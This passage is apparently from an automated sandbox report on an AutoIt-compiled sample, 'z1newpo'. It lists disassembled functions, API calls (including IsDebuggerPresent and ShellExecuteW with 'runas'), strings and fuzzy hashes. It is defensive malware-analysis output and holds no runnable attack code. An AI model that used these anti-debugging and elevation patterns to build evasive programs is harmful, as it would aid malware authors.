                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                    • String ID:
                                                    • API String ID: 2383988440-0
                                                    • Opcode ID: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                                                    • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                    • Opcode Fuzzy Hash: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                                                    • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                                                    Function 0040D590 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144windowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                      • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                      • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                      • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                      • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                      • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                      • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                    • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                    • GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                      • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                    • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                    • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                    • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                      • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                      • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                      • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                      • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                      • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                      • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                      • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                      • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                      • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                      • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                      • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                      • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                    Strings
                                                    • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                                                    • runas, xrefs: 0042E2AD, 0042E2DC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                    • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                    • API String ID: 2495805114-3383388033
                                                    • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                    • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                    • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                    • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
                                                    Function 0040E500 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 157COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1904 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1913 40e582-40e583 1904->1913 1914 427674-427679 1904->1914 1917 40e585-40e596 1913->1917 1918 40e5ba-40e5cb call 40ef60 1913->1918 1915 427683-427686 1914->1915 1916 42767b-427681 1914->1916 1919 427693-427696 1915->1919 1920 427688-427691 1915->1920 1924 4276b4-4276be 1916->1924 1921 427625-427629 1917->1921 1922 40e59c-40e59f 1917->1922 1935 40e5ec-40e60c 1918->1935 1936 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1918->1936 1919->1924 1927 427698-4276a8 1919->1927 1920->1924 1929 427636-427640 1921->1929 1930 42762b-427631 1921->1930 1925 40e5a5-40e5ae 1922->1925 1926 427654-427657 1922->1926 1937 4276c6-4276ca GetSystemInfo 1924->1937 1931 40e5b4 1925->1931 1932 427645-42764f 1925->1932 1926->1918 1938 42765d-42766f 1926->1938 1933 4276b0 1927->1933 1934 4276aa-4276ae 1927->1934 1929->1918 1930->1918 1931->1918 1932->1918 1933->1924 1934->1924 1940 40e612-40e623 call 40efd0 1935->1940 1941 4276d5-4276df GetSystemInfo 1935->1941 1936->1935 1948 40e5e8 1936->1948 1937->1941 1938->1918 1940->1937 1945 40e629-40e63f call 40ef90 GetNativeSystemInfo 1940->1945 1950 40e641-40e642 FreeLibrary 1945->1950 1951 40e644-40e651 1945->1951 1948->1935 1950->1951 1952 40e653-40e654 FreeLibrary 1951->1952 1953 40e656-40e65d 1951->1953 1952->1953
                                                    APIs
                                                    • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                    • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                    • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                    • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                    • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                    • String ID: 0SH
                                                    • API String ID: 3363477735-851180471
                                                    • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                    • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                    • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                    • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                    Function 0040EBD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                    • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: IsThemeActive$uxtheme.dll
                                                    • API String ID: 2574300362-3542929980
                                                    • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                    • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                    • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                    • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                    Function 004091E0 Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                    • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                    • TranslateMessage.USER32(?), ref: 00409556
                                                    • DispatchMessageW.USER32(?), ref: 00409561
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Message$Peek$DispatchSleepTranslate
                                                    • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                    • API String ID: 1762048999-758534266
                                                    • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                    • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                    • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                    • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
                                                    Function 00401F20 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 214COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • __wcsicoll.LIBCMT ref: 00402007
                                                    • __wcsicoll.LIBCMT ref: 0040201D
                                                    • __wcsicoll.LIBCMT ref: 00402033
                                                      • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                    • __wcsicoll.LIBCMT ref: 00402049
                                                    • _wcscpy.LIBCMT ref: 0040207C
                                                    • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
                                                    • API String ID: 3948761352-1609664196
                                                    • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                    • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                    • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                    • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
                                                    Function 0040E360 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                    • __wsplitpath.LIBCMT ref: 0040E41C
                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                    • _wcsncat.LIBCMT ref: 0040E433
                                                    • __wmakepath.LIBCMT ref: 0040E44F
                                                      • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                    • _wcscpy.LIBCMT ref: 0040E487
                                                      • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                    • _wcscat.LIBCMT ref: 00427541
                                                    • _wcslen.LIBCMT ref: 00427551
                                                    • _wcslen.LIBCMT ref: 00427562
                                                    • _wcscat.LIBCMT ref: 0042757C
                                                    • _wcsncpy.LIBCMT ref: 004275BC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                    • String ID: Include$\
                                                    • API String ID: 3173733714-3429789819
                                                    • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                    • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                    • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                    • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
                                                    Function 004528BD Relevance: 19.7, APIs: 13, Instructions: 173COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • _fseek.LIBCMT ref: 0045292B
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                      • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                      • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                    • __fread_nolock.LIBCMT ref: 00452961
                                                    • __fread_nolock.LIBCMT ref: 00452971
                                                    • __fread_nolock.LIBCMT ref: 0045298A
                                                    • __fread_nolock.LIBCMT ref: 004529A5
                                                    • _fseek.LIBCMT ref: 004529BF
                                                    • _malloc.LIBCMT ref: 004529CA
                                                    • _malloc.LIBCMT ref: 004529D6
                                                    • __fread_nolock.LIBCMT ref: 004529E7
                                                    • _free.LIBCMT ref: 00452A17
                                                    • _free.LIBCMT ref: 00452A20
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                    • String ID:
                                                    • API String ID: 1255752989-0
                                                    • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                    • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                    • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                    • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59
                                                    Function 00452719 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 147COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock$_fseek_wcscpy
                                                    • String ID: FILE
                                                    • API String ID: 3888824918-3121273764
                                                    • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                    • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                    • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                    • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5
                                                    Function 00410490 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56windowregistryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                    • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                    • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                    • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                    • ImageList_ReplaceIcon.COMCTL32(00950AB8,000000FF,00000000), ref: 00410552
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                    • API String ID: 2914291525-1005189915
                                                    • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                    • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                    • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                    • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99
                                                    Function 00410390 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                    • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                    • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                    • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                    • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                    • RegisterClassExW.USER32(?), ref: 0041045D
                                                      • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                      • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                      • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                      • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                      • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                      • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                      • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00950AB8,000000FF,00000000), ref: 00410552
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
